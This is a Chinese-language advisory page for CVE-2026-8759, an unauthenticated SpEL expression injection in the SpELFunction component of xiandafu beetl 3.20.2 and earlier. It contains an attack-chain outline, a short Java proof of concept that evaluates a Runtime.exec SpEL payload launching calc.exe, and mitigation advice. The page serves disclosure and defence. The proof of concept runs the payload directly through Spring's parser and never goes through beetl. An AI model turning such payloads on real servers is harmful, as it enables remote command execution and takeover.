CVE-2026-8759 CVSS 7.3 高危

CVE-2026-8759 beetl SpEL注入漏洞

披露日期: 2026-05-17

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-8759

漏洞类型

表达式注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

xiandafu beetl

漏洞概述

xiandafu beetl 3.20.2及之前版本中的SpELFunction组件存在严重的表达式注入漏洞。该漏洞源于对表达式语言语句中使用的特殊元素处理不当，导致攻击者可以注入恶意的SpEL表达式。由于漏洞利用无需认证且无用户交互要求，攻击者可远程发起攻击。目前公开的利用代码已经存在，且项目方尚未对此问题做出响应，风险极高。

技术细节

该漏洞位于beetl-classic-integration模块的SpELFunction.java文件中。当Beetl与Spring框架集成时，SpELFunction类被用于解析和执行Spring Expression Language (SpEL)。由于代码在处理外部输入时未进行有效的过滤和清洗，直接将输入传递给SpEL解析器，导致攻击者能够构造恶意的表达式。攻击者可以利用SpEL的类类型引用（T()）和对象实例化功能，调用Java Runtime类执行任意系统命令（如反弹Shell），或读取敏感文件。鉴于CVSS向量显示攻击复杂度低且无需权限，该漏洞极易被自动化扫描工具探测并利用，导致服务器被完全接管。

攻击链分析

STEP 1

1. 信息收集

攻击者通过网络扫描识别使用xiandafu beetl框架且版本低于3.20.2的目标服务器。

STEP 2

2. 载荷构造

攻击者构造恶意的SpEL表达式载荷，旨在触发远程代码执行（RCE），例如调用Runtime.exec()。

STEP 3

3. 漏洞利用

攻击者向目标服务器发送HTTP请求，将恶意载荷传递给SpELFunction接口。

STEP 4

4. 命令执行

服务器端解析恶意SpEL表达式，执行攻击者指定的系统命令，从而获得服务器控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import org.springframework.expression.Expression;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.StandardEvaluationContext;

public class SpELPoC {
    public static void main(String[] args) {
        // Malicious payload to execute operating system command
        // This payload attempts to open calculator on Windows
        String payload = "T(java.lang.Runtime).getRuntime().exec('calc.exe')";

        try {
            // Create SpEL parser and context
            SpelExpressionParser parser = new SpelExpressionParser();
            StandardEvaluationContext context = new StandardEvaluationContext();

            // Parse and execute the expression
            Expression expression = parser.parseExpression(payload);
            Object value = expression.getValue(context);

            System.out.println("Exploit executed, return value: " + value);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

影响范围

xiandafu beetl <= 3.20.2

防御指南

临时缓解措施

由于官方尚未发布修复补丁，建议立即排查业务系统中是否集成了受影响版本的beetl组件。如果存在，应临时移除或注释掉SpELFunction相关的代码逻辑。同时，加强对Web应用流量的监控，拦截包含SpEL特征（如T(java.lang.Runtime)）的恶意请求。此外，应遵循最小权限原则，以非特权用户身份运行应用程序，降低潜在RCE带来的影响。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8759
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8759
3 Details https://www.cvedetails.com/cve/CVE-2026-8759/
4 VulDB https://vuldb.com/cve/CVE-2026-8759
5 Link https://gitee.com/xiandafu/beetl/
6 Link https://gitee.com/xiandafu/beetl/issues/IIYAWC
7 Link https://vuldb.com/submit/811316
8 Link https://vuldb.com/vuln/364386
9 Link https://vuldb.com/vuln/364386/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表